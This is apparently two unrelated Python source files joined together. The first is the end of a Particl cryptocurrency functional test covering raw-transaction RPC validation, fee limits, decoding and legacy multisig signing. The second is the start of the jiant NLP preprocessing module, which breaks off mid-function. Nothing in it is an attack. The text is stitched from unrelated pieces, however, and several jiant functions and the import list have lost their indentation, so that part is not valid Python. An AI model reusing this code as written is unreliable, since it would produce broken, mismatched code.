            gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True)
            assert_equal(gottx['txid'], tx)
            assert 'in_active_chain' not in gottx
        else:
            self.log.info("Test getrawtransaction without -txindex, without blockhash: expect the call to raise")
            err_msg = (
                "No such mempool transaction. Use -txindex or provide a block hash to enable"
                " blockchain transaction queries. Use gettransaction for wallet transactions."
            )
            assert_raises_rpc_error(-5, err_msg, self.nodes[n].getrawtransaction, txid=tx, verbose=True)
        # We should not get the tx if we provide an unrelated block
        assert_raises_rpc_error(-5, "No such transaction found", self.nodes[n].getrawtransaction, txid=tx, blockhash=block2)
        # An invalid block hash should raise the correct errors
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[n].getrawtransaction, txid=tx, blockhash=True)
        assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 6, for 'foobar')", self.nodes[n].getrawtransaction, txid=tx, blockhash="foobar")
        assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 8, for 'abcd1234')", self.nodes[n].getrawtransaction, txid=tx, blockhash="abcd1234")
        foo = "ZZZ0000000000000000000000000000000000000000000000000000000000000"
        assert_raises_rpc_error(-8, f"parameter 3 must be hexadecimal string (not '{foo}')", self.nodes[n].getrawtransaction, txid=tx, blockhash=foo)
        bar = "0000000000000000000000000000000000000000000000000000000000000000"
        assert_raises_rpc_error(-5, "Block hash not found", self.nodes[n].getrawtransaction, txid=tx, blockhash=bar)
        # Undo the blocks and verify that "in_active_chain" is false.
        self.nodes[n].invalidateblock(block1)
        gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
        assert_equal(gottx['in_active_chain'], False)
        self.nodes[n].reconsiderblock(block1)
        assert_equal(self.nodes[n].getbestblockhash(), block2)
    self.log.info("Test getrawtransaction on genesis block coinbase returns an error")
    block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
    assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
def createrawtransaction_tests(self):
    """Exercise createrawtransaction argument validation and output formats.

    Covers: required/extra parameters, malformed `inputs` (bad txid, missing
    vout, bad sequence numbers), malformed `outputs` (bad address, amounts,
    duplicates), `locktime`/`replaceable` range checks, and equivalence of the
    object vs. array forms of `outputs`.
    """
    self.log.info("Test createrawtransaction")
    # Test `createrawtransaction` required parameters
    assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
    assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
    # Test `createrawtransaction` invalid extra parameters
    assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
    # Test `createrawtransaction` invalid `inputs`
    assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
    assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
    assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].createrawtransaction, [{}], {})
    assert_raises_rpc_error(-8, "txid must be of length 64 (not 3, for 'foo')", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
    # Correct length but non-hex characters: rejected as non-hexadecimal.
    txid = "ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844"
    assert_raises_rpc_error(-8, f"txid must be hexadecimal string (not '{txid}')", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
    assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': TXID}], {})
    assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': TXID, 'vout': 'foo'}], {})
    assert_raises_rpc_error(-8, "Invalid parameter, vout cannot be negative", self.nodes[0].createrawtransaction, [{'txid': TXID, 'vout': -1}], {})
    # sequence number out of range (valid range is 0..0xffffffff)
    for invalid_seq in [-1, 4294967296]:
        inputs = [{'txid': TXID, 'vout': 1, 'sequence': invalid_seq}]
        outputs = {self.nodes[0].getnewaddress(): 1}
        assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range',
                                self.nodes[0].createrawtransaction, inputs, outputs)
    # with valid sequence number
    for valid_seq in [1000, 4294967294]:
        inputs = [{'txid': TXID, 'vout': 1, 'sequence': valid_seq}]
        outputs = {self.nodes[0].getnewaddress(): 1}
        rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
        decrawtx = self.nodes[0].decoderawtransaction(rawtx)
        assert_equal(decrawtx['vin'][0]['sequence'], valid_seq)
    # Test `createrawtransaction` invalid `outputs`
    address = self.nodes[0].getnewaddress()
    address2 = self.nodes[0].getnewaddress()
    assert_raises_rpc_error(-1, "JSON value is not an array as expected", self.nodes[0].createrawtransaction, [], 'foo')
    self.nodes[0].createrawtransaction(inputs=[], outputs={})  # Should not throw for backwards compatibility
    self.nodes[0].createrawtransaction(inputs=[], outputs=[])
    assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
    assert_raises_rpc_error(-5, "Invalid Particl address", self.nodes[0].createrawtransaction, [], {'foo': 0})
    assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
    assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
    # Duplicate destinations are rejected in both the object and array forms.
    assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
    assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
    assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], [{"data": 'aa'}, {"data": "bb"}])
    assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], multidict([("data", 'aa'), ("data", "bb")]))
    assert_raises_rpc_error(-8, "Invalid parameter, key-value pair must contain exactly one key", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
    assert_raises_rpc_error(-8, "Invalid parameter, key-value pair not an object as expected", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
    # Test `createrawtransaction` invalid `locktime`
    assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
    assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
    assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
    # Test `createrawtransaction` invalid `replaceable`
    assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
    # Test that createrawtransaction accepts an array and object as outputs
    # One output
    tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs={address: 99}))
    assert_equal(len(tx.vout), 1)
    assert_equal(
        tx.serialize().hex(),
        self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}]),
    )
    # Two outputs
    tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))
    assert_equal(len(tx.vout), 2)
    assert_equal(
        tx.serialize().hex(),
        self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
    )
    # Multiple mixed outputs
    tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))
    assert_equal(len(tx.vout), 3)
    assert_equal(
        tx.serialize().hex(),
        self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
    )
def signrawtransactionwithwallet_tests(self):
    """Check signrawtransactionwithwallet prevtx validation for each address type.

    Segwit address types commit to the input amount, so a prevtx entry
    without "amount" is rejected; legacy inputs sign without it.
    The txid/vout/scriptPubKey keys are mandatory for every address type.
    """
    # NOTE: loop variable renamed from `type` to avoid shadowing the builtin.
    for addr_type in ["bech32", "p2sh-segwit", "legacy"]:
        self.log.info(f"Test signrawtransactionwithwallet with missing prevtx info ({addr_type})")
        addr = self.nodes[0].getnewaddress("", addr_type)
        addrinfo = self.nodes[0].getaddressinfo(addr)
        pubkey = addrinfo["scriptPubKey"]
        inputs = [{'txid': TXID, 'vout': 3, 'sequence': 1000}]
        outputs = {self.nodes[0].getnewaddress(): 1}
        rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
        # A fully-specified prevtx always signs successfully.
        prevtx = dict(txid=TXID, scriptPubKey=pubkey, vout=3, amount=1)
        succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
        assert succ["complete"]
        if addr_type == "legacy":
            # Pre-segwit signatures do not commit to the amount, so it is optional.
            del prevtx["amount"]
            succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
            assert succ["complete"]
        else:
            assert_raises_rpc_error(-3, "Missing amount", self.nodes[0].signrawtransactionwithwallet, rawtx, [
                {
                    "txid": TXID,
                    "scriptPubKey": pubkey,
                    "vout": 3,
                }
            ])
        # These keys are mandatory regardless of address type.
        assert_raises_rpc_error(-3, "Missing vout", self.nodes[0].signrawtransactionwithwallet, rawtx, [
            {
                "txid": TXID,
                "scriptPubKey": pubkey,
                "amount": 1,
            }
        ])
        assert_raises_rpc_error(-3, "Missing txid", self.nodes[0].signrawtransactionwithwallet, rawtx, [
            {
                "scriptPubKey": pubkey,
                "vout": 3,
                "amount": 1,
            }
        ])
        assert_raises_rpc_error(-3, "Missing scriptPubKey", self.nodes[0].signrawtransactionwithwallet, rawtx, [
            {
                "txid": TXID,
                "vout": 3,
                "amount": 1
            }
        ])
def sendrawtransaction_tests(self):
    """A transaction spending a non-existent input must be rejected."""
    self.log.info("Test sendrawtransaction with missing input")
    # Reference a vout that was never created.
    spend_missing = [{'txid': TXID, 'vout': 1}]  # won't exist
    payout = {self.nodes[0].getnewaddress(): 4.998}
    unsigned = self.nodes[2].createrawtransaction(spend_missing, payout)
    signed = self.nodes[2].signrawtransactionwithwallet(unsigned)
    assert_raises_rpc_error(-25, "bad-txns-inputs-missingorspent", self.nodes[2].sendrawtransaction, signed['hex'])
def sendrawtransaction_testmempoolaccept_tests(self):
    """Check maxfeerate enforcement in sendrawtransaction/testmempoolaccept,
    and rejection of transactions that are already mined."""
    self.log.info("Test sendrawtransaction/testmempoolaccept with maxfeerate")
    fee_exceeds_max = "Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)"
    # Test a transaction with a small fee.
    txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
    rawTx = self.nodes[0].getrawtransaction(txId, True)
    vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
    self.sync_all()
    inputs = [{"txid": txId, "vout": vout['n']}]
    # Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 BTC/sat)) = 0.9999
    outputs = {self.nodes[0].getnewaddress(): Decimal("0.99990000")}
    rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
    rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
    assert_equal(rawTxSigned['complete'], True)
    # Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 BTC/kB
    # Thus, testmempoolaccept should reject
    testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
    assert_equal(testres['allowed'], False)
    assert_equal(testres['reject-reason'], 'max-fee-exceeded')
    # and sendrawtransaction should throw
    assert_raises_rpc_error(-25, fee_exceeds_max, self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
    # and the following calls should both succeed
    # (default maxfeerate is high enough for a 100 sat/byte fee)
    testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
    assert_equal(testres['allowed'], True)
    self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
    # Test a transaction with a large fee.
    txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
    rawTx = self.nodes[0].getrawtransaction(txId, True)
    vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
    self.sync_all()
    inputs = [{"txid": txId, "vout": vout['n']}]
    # Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 BTC/sat)) = 0.98
    outputs = {self.nodes[0].getnewaddress() : Decimal("0.98000000")}
    rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
    rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
    assert_equal(rawTxSigned['complete'], True)
    # Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 BTC/kB
    # Thus, testmempoolaccept should reject
    # (this time against the default maxfeerate)
    testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
    assert_equal(testres['allowed'], False)
    assert_equal(testres['reject-reason'], 'max-fee-exceeded')
    # and sendrawtransaction should throw
    assert_raises_rpc_error(-25, fee_exceeds_max, self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
    # and the following calls should both succeed
    # once maxfeerate is raised explicitly
    testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
    assert_equal(testres['allowed'], True)
    self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
    self.log.info("Test sendrawtransaction/testmempoolaccept with tx already in the chain")
    self.generate(self.nodes[2], 1)
    self.sync_blocks()
    # Every node must now reject resubmission of the mined transaction.
    for node in self.nodes:
        testres = node.testmempoolaccept([rawTxSigned['hex']])[0]
        assert_equal(testres['allowed'], False)
        assert_equal(testres['reject-reason'], 'txn-already-known')
        assert_raises_rpc_error(-27, 'Transaction already in block chain', node.sendrawtransaction, rawTxSigned['hex'])
def decoderawtransaction_tests(self):
    """Check witness vs. non-witness decoding, including an ambiguous
    serialization that must be interpreted as a witness transaction."""
    self.log.info("Test decoderawtransaction")
    # witness transaction
    encrawtx = "010000000001010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f50500000000000102616100000000"
    decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True)  # decode as witness transaction
    assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
    assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False)  # force decode as non-witness transaction
    # non-witness transaction
    encrawtx = "01000000010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f505000000000000000000"
    decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False)  # decode as non-witness transaction
    assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
    # known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
    coinbase = "03c68708046ff8415c622f4254432e434f4d2ffabe6d6de1965d02c68f928e5b244ab1965115a36f56eb997633c7f690124bbf43644e23080000000ca3d3af6d005a65ff0200fd00000000"
    encrawtx = f"020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff4b{coinbase}" \
               "ffffffff03f4c1fb4b0000000016001497cfc76442fe717f2a3f0cc9c175f7561b6619970000000000000000266a24aa21a9ed957d1036a80343e0d1b659497e1b48a38ebe876a056d45965fac4a85cda84e1900000000000000002952534b424c4f434b3a8e092581ab01986cbadc84f4b43f4fa4bb9e7a2e2a0caf9b7cf64d939028e22c0120000000000000000000000000000000000000000000000000000000000000000000000000"
    decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
    decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
    assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False)  # fails to decode as non-witness transaction
    assert_equal(decrawtx, decrawtx_wit)  # the witness interpretation should be chosen
    assert_equal(decrawtx['vin'][0]['coinbase'], coinbase)
def transaction_version_number_tests(self):
    """Check decoding of boundary transaction version numbers."""
    self.log.info("Test transaction version numbers")
    # Test the minimum transaction version number that fits in a signed 32-bit integer.
    # As transaction version is unsigned, this should convert to its unsigned equivalent.
    tx = CTransaction()
    tx.nVersion = -0x80000000
    rawtx = tx.serialize().hex()
    decrawtx = self.nodes[0].decoderawtransaction(rawtx)
    assert_equal(decrawtx['version'], 0x80000000)
    # The block below is intentionally disabled (string statement, not executed).
    """
    # Removed as collides with particl version
    # Test the maximum transaction version number that fits in a signed 32-bit integer.
    tx = CTransaction()
    tx.nVersion = 0x7fffffff
    rawtx = tx.serialize().hex()
    decrawtx = self.nodes[0].decoderawtransaction(rawtx)
    assert_equal(decrawtx['version'], 0x7fffffff)
    """
def raw_multisig_transaction_legacy_tests(self):
    """Legacy (non-descriptor) multisig workflows: 2of2 funding, 2of3 signing
    across nodes, and combining partially-signed txs with combinerawtransaction."""
    self.log.info("Test raw multisig transactions (legacy)")
    # The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
    # The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
    # 2of2 test
    addr1 = self.nodes[2].getnewaddress()
    addr2 = self.nodes[2].getnewaddress()
    addr1Obj = self.nodes[2].getaddressinfo(addr1)
    addr2Obj = self.nodes[2].getaddressinfo(addr2)
    # Tests for createmultisig and addmultisigaddress
    assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
    # createmultisig can only take public keys
    self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
    # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here
    assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1])
    mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
    # use balance deltas instead of absolute values
    bal = self.nodes[2].getbalance()
    # send 1.2 BTC to msig adr
    txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    # node2 has both keys of the 2of2 ms addr, tx should affect the balance
    assert_equal(self.nodes[2].getbalance(), bal + Decimal('1.20000000'))
    # 2of3 test from different nodes
    bal = self.nodes[2].getbalance()
    addr1 = self.nodes[1].getnewaddress()
    addr2 = self.nodes[2].getnewaddress()
    addr3 = self.nodes[2].getnewaddress()
    addr1Obj = self.nodes[1].getaddressinfo(addr1)
    addr2Obj = self.nodes[2].getaddressinfo(addr2)
    addr3Obj = self.nodes[2].getaddressinfo(addr3)
    mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
    txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
    decTx = self.nodes[0].gettransaction(txId)
    rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    # THIS IS AN INCOMPLETE FEATURE
    # NODE2 HAS TWO OF THREE KEYS AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
    assert_equal(self.nodes[2].getbalance(), bal)  # for now, assume the funds of a 2of3 multisig tx are not marked as spendable
    txDetails = self.nodes[0].gettransaction(txId, True)
    rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
    vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
    bal = self.nodes[0].getbalance()
    # Spend the 2of3 output: node1 alone cannot complete the signature,
    # node2 (holding two keys) can.
    inputs = [{"txid": txId, "vout": vout['n'], "scriptPubKey": vout['scriptPubKey']['hex'], "amount": vout['value']}]
    outputs = {self.nodes[0].getnewaddress(): 2.19}
    rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
    rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
    assert_equal(rawTxPartialSigned['complete'], False)  # node1 only has one key, can't comp. sign the tx
    rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
    assert_equal(rawTxSigned['complete'], True)  # node2 can sign the tx compl., own two of three keys
    self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
    rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    assert_equal(self.nodes[0].getbalance(), bal + Decimal('50.00000000') + Decimal('2.19000000'))  # block reward + tx
    # 2of2 test for combining transactions
    bal = self.nodes[2].getbalance()
    addr1 = self.nodes[1].getnewaddress()
    addr2 = self.nodes[2].getnewaddress()
    addr1Obj = self.nodes[1].getaddressinfo(addr1)
    addr2Obj = self.nodes[2].getaddressinfo(addr2)
    self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
    mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
    mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
    txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
    decTx = self.nodes[0].gettransaction(txId)
    rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    assert_equal(self.nodes[2].getbalance(), bal)  # the funds of a 2of2 multisig tx should not be marked as spendable
    txDetails = self.nodes[0].gettransaction(txId, True)
    rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
    vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
    bal = self.nodes[0].getbalance()
    # Each node signs with its single key; neither signature alone is
    # complete, but combinerawtransaction merges them into a valid tx.
    inputs = [{"txid": txId, "vout": vout['n'], "scriptPubKey": vout['scriptPubKey']['hex'], "redeemScript": mSigObjValid['hex'], "amount": vout['value']}]
    outputs = {self.nodes[0].getnewaddress(): 2.19}
    rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
    rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
    self.log.debug(rawTxPartialSigned1)
    assert_equal(rawTxPartialSigned1['complete'], False)  # node1 only has one key, can't comp. sign the tx
    rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
    self.log.debug(rawTxPartialSigned2)
    assert_equal(rawTxPartialSigned2['complete'], False)  # node2 only has one key, can't comp. sign the tx
    rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
    self.log.debug(rawTxComb)
    self.nodes[2].sendrawtransaction(rawTxComb)
    rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    assert_equal(self.nodes[0].getbalance(), bal + Decimal('50.00000000') + Decimal('2.19000000'))  # block reward + tx
# Script entry point: run the functional test when invoked directly.
if __name__ == '__main__':
    RawTransactionsTest().main()
|
"""Preprocessing functions and pipeline
The pipeline has three steps:
1) create / load tasks, which includes
a) load raw data
b) tokenize raw data
2) create / load all vocabularies (word, char, task-specific target vocabs)
a) count tokens of a vocab
b) take the N most frequent tokens
3) index all the data using appropriate indexers
We save indexed data to streamable Records to save memory.
"""
import _pickle as pkl # :(
import copy
import io
import logging as log
import os
import sys
from collections import defaultdict
import numpy as np
import torch
from allennlp.data import Vocabulary
from allennlp.data.token_indexers import (
ELMoTokenCharactersIndexer,
SingleIdTokenIndexer,
TokenCharactersIndexer,
)
from jiant.tasks import (
ALL_DIAGNOSTICS,
ALL_COLA_NPI_TASKS,
ALL_GLUE_TASKS,
ALL_SUPERGLUE_TASKS,
ALL_NLI_PROBING_TASKS,
)
from jiant.tasks import REGISTRY as TASKS_REGISTRY
from jiant.utils import config, serialize, utils
# NOTE: these are not the same as AllenNLP SOS, EOS tokens
SOS_TOK, EOS_TOK = "<SOS>", "<EOS>"  # sentence-boundary markers added during tokenization
# NOTE: pad and unk tokens are created by AllenNLP vocabs by default
SPECIALS = [SOS_TOK, EOS_TOK]  # tokens reserved in every word vocabulary
UNK_TOK = "@@UNKNOWN@@"  # AllenNLP unk token
ALL_SPLITS = ["train", "val", "test"]  # dataset splits processed for every task
def _get_serialized_record_path(task_name, split, preproc_dir):
"""Get the canonical path for a serialized task split."""
serialized_record_path = os.path.join(preproc_dir, "{:s}__{:s}_data".format(task_name, split))
return serialized_record_path
def _get_instance_generator(task_name, split, preproc_dir, fraction=None):
    """Return a lazy, repeatable iterator over a task split's serialized data.

    Args:
        task_name: (string), task name
        split: (string), split name ('train', 'val', or 'test')
        preproc_dir: (string) path to preprocessing dir
        fraction: if set to a float between 0 and 1, load only the specified percentage
            of examples. Hashing is used to ensure that the same examples are loaded each
            epoch.

    Returns:
        serialize.RepeatableIterator yielding Instance objects
    """
    record_path = _get_serialized_record_path(task_name, split, preproc_dir)
    assert os.path.isfile(record_path), "Record file '%s' not found!" % record_path
    return serialize.read_records(record_path, repeatable=True, fraction=fraction)
def _indexed_instance_generator(instance_iter, vocab):
    """Yield indexed instances. Instances are modified in-place.

    TODO(iftenney): multiprocess the $%^& out of this.

    Args:
        instance_iter: iterable(Instance) of examples
        vocab: Vocabulary for use in indexing

    Yields:
        Instance with indexed fields.
    """
    for inst in instance_iter:
        inst.index_fields(vocab)
        # Drop raw token lists once indexed to cut memory and disk usage.
        del_field_tokens(inst)
        yield inst
def del_field_tokens(instance):
    """Save memory by deleting tokens that will no longer be used.

    Only the 'input1' and 'input2' fields are stripped; all other fields
    keep their tokens in memory.

    Args:
        instance: AllenNLP Instance. Modified in-place.
    """
    for field_name in ("input1", "input2"):
        if field_name in instance.fields:
            del instance.fields[field_name].tokens
def _index_split(task, split, indexers, vocab, record_file):
    """Index a task split's instances and stream them to disk.

    Args:
        task: Task instance
        split: (string), 'train', 'val', or 'test'
        indexers: dict of token indexers
        vocab: Vocabulary instance
        record_file: (string) file to write serialized Instances to
    """
    log_prefix = "\tTask %s (%s)" % (task.name, split)
    log.info("%s: Indexing from scratch.", log_prefix)
    split_text = task.get_split_text(split)
    instance_iter = task.process_split(split_text, indexers)
    if hasattr(instance_iter, "__len__"):  # if non-lazy
        # BUGFIX: log.warn is a deprecated alias; use log.warning.
        log.warning(
            "%s: non-lazy Instance generation. You'll want to refactor "
            "%s.process_split to return a lazy iterator.",
            log_prefix,
            type(task).__name__,
        )
        log.info("%s: %d examples to index", log_prefix, len(instance_iter))
        # Copy so that we don't store indexed data in memory.
        # TODO: remove this case and stream everything.
        instance_iter = utils.copy_iter(instance_iter)

    # Counter for lazy-loaded data, so we can log the # of elements.
    _instance_counter = 0

    def _counter_iter(elems):
        # Pass-through generator that counts how many items flow past.
        nonlocal _instance_counter
        for elem in elems:
            _instance_counter += 1
            yield elem

    instance_iter = _counter_iter(instance_iter)

    # Actually call generators and stream to disk.
    serialize.write_records(_indexed_instance_generator(instance_iter, vocab), record_file)
    log.info("%s: Saved %d instances to %s", log_prefix, _instance_counter, record_file)
def _find_cached_file(
exp_dir: str, global_exp_cache_dir: str, relative_path: str, log_prefix: str = ""
) -> bool:
"""Find a cached file.
Look in local exp_dir first, then in global_exp_cache_dir. If found in the
global dir, make a symlink in the local dir pointing to the global one.
Args:
exp_dir: (string) local experiment dir
global_exp_cache_dir: (string) global experiment cache
relative_path: (string) relative path to file, from exp_dir
log_prefix: (string) prefix for logging info
Returns:
True if file was found in either location.
"""
if log_prefix:
log_prefix = log_prefix + ": "
# Try in local preproc dir.
local_file = os.path.join(exp_dir, relative_path)
if os.path.isfile(local_file) or os.path.islink(local_file):
log.info("%sFound preprocessed copy in %s", log_prefix, local_file)
return True
# Try in global preproc dir; if found, make a symlink.
global_file = os.path.join(global_exp_cache_dir, relative_path)
if os.path.exists(global_file):
log.info("%sFound (global) preprocessed copy in %s", log_prefix, global_file)
os.symlink(global_file, local_file)
log.info("%sCreated symlink: %s -> %s", log_prefix, local_file, global_file)
return True
return False
def _build_embeddings(args, vocab, emb_file: str):
    """ Build word embeddings from scratch (as opposed to loading them from a pickle),
    using precomputed fastText / GloVe embeddings. """
    # Load all the word embeddings based on vocabulary
    log.info("\tBuilding embeddings from scratch.")
    word_v_size, unk_idx = vocab.get_vocab_size("tokens"), vocab.get_token_index(vocab._oov_token)
    # Start from random vectors; rows for words present in the embedding file
    # are overwritten below, so only out-of-file words keep random init.
    embeddings = np.random.randn(word_v_size, args.d_word)
    with io.open(
        args.word_embs_file, "r", encoding="utf-8", newline="\n", errors="ignore"
    ) as vec_fh:
        for line in vec_fh:
            # Each line: "<word> <v1> <v2> ...". NOTE(review): assumes the file's
            # vector width equals args.d_word -- confirm against the embeddings file.
            word, vec = line.split(" ", 1)
            idx = vocab.get_token_index(word)
            if idx != unk_idx:
                embeddings[idx] = np.array(list(map(float, vec.split())))
    # Zero out the padding token's vector.
    embeddings[vocab.get_token_index(vocab._padding_token)] = 0.0
    embeddings = torch.FloatTensor(embeddings)
    log.info("\tFinished loading embeddings")
    # Save/cache the word embeddings
    pkl.dump(embeddings, open(emb_file, "wb"))
    log.info("\tSaved embeddings to %s", emb_file)
    return embeddings
def _build_vocab(args, tasks, vocab_path: str):
    """ Build vocabulary from scratch, reading data from tasks,
    and save it to vocab_path. """
    # NOTE: task-specific target vocabulary should be counted in the task object
    # and provided via `task.all_labels()`. The namespace should be task-specific,
    # i.e. not something generic like "targets".
    log.info("\tBuilding vocab from scratch.")
    # Cap word/char vocabulary sizes per the configured limits.
